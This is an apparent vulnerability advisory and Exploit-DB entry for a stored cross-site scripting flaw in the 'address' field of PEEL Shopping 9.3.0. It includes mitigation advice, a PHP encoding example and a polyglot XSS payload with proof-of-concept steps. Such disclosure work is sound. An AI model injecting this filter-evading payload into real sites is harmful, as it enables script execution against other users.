Vendor: PEEL SHOPPING
By: Anmol K Sachan
CVSS: 5.5 (MEDIUM)
Vulnerability Type: Stored Cross-site Scripting
CWE: 79
Product Name: PEEL SHOPPING
Affected Version From: PEEL SHOPPING 9.3.0
Affected Version To: PEEL SHOPPING 9.3.0
Patch Exists: NO
CPE: a:peel:shopping:9.3.0
Platforms Tested: Windows 10 XAMPP
2021

PEEL Shopping 9.3.0 – ‘address’ Stored Cross-Site Scripting

This application is vulnerable to stored XSS. The vulnerability is in the 'address' parameter of the 'change_params.php' script. An attacker can inject malicious JavaScript code into the address field, and that code is executed when a user interacts with the page.

Mitigation:

To mitigate this vulnerability, the application should properly validate and sanitize user input before displaying it on the page. All user-supplied data should be encoded or escaped on output so that it cannot execute as code.
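One way to apply the encoding described above, as an added example (not PEEL's code, which this page does not show). The helper names `h`, `js` and `validateAddress`, the field markup and the sample value are assumptions constructed for illustration; the value is encoded separately for each output context because the posted payload tries to close several contexts at once (style, title, textarea, script).

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; not taken from PEEL Shopping.

/** Encode for HTML element content and quoted attribute values. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Encode for a value embedded in an inline <script> block. */
function js(string $value): string
{
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

/** Input-side check before storing: length limit (bytes) and no control characters. */
function validateAddress(string $raw): string
{
    $address = trim($raw);
    if ($address === '' || strlen($address) > 255) {
        throw new InvalidArgumentException('Address is empty or too long');
    }
    // Tab, LF and CR are allowed; other C0 controls and DEL are rejected.
    if (preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', $address) === 1) {
        throw new InvalidArgumentException('Address contains control characters');
    }
    return $address;
}

// Constructed sample: harmless markup that tries to close a textarea and an attribute.
$stored = validateAddress("12 Rue Example</textarea>\"><b id='probe'>x</b>");

// Before: raw echo lets the stored markup end the field and become live HTML.
$vulnerable = '<textarea name="address">' . $stored . '</textarea>';

// After: the same stored value, encoded for each context it is written into.
$safeTextarea = '<textarea name="address">' . h($stored) . '</textarea>';
$safeInput    = '<input type="text" name="address" value="' . h($stored) . '">';
$safeScript   = '<script>var address = ' . js($stored) . ';</script>';

foreach ([$vulnerable, $safeTextarea, $safeInput, $safeScript] as $html) {
    echo $html, PHP_EOL;
}
```

Validation alone does not stop the sample value, which passes `validateAddress`; the encoding at output is what keeps it inert.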

Exploit-DB raw data:

# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
# Date: 2021-02-11
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://www.peel.fr/
# Software Link: https://sourceforge.net/projects/peel-shopping/
# Software: PEEL SHOPPING 9.3.0
# Vulnerability Type: Stored Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10 XAMPP
# This application is vulnerable to Stored XSS.
# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
# Vulnerable parameters: 'Address'
# Payload used: 

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

# POC: On the same page where we injected the payload, click on the text box to edit the address.
# You will see your JavaScript code (XSS) executed.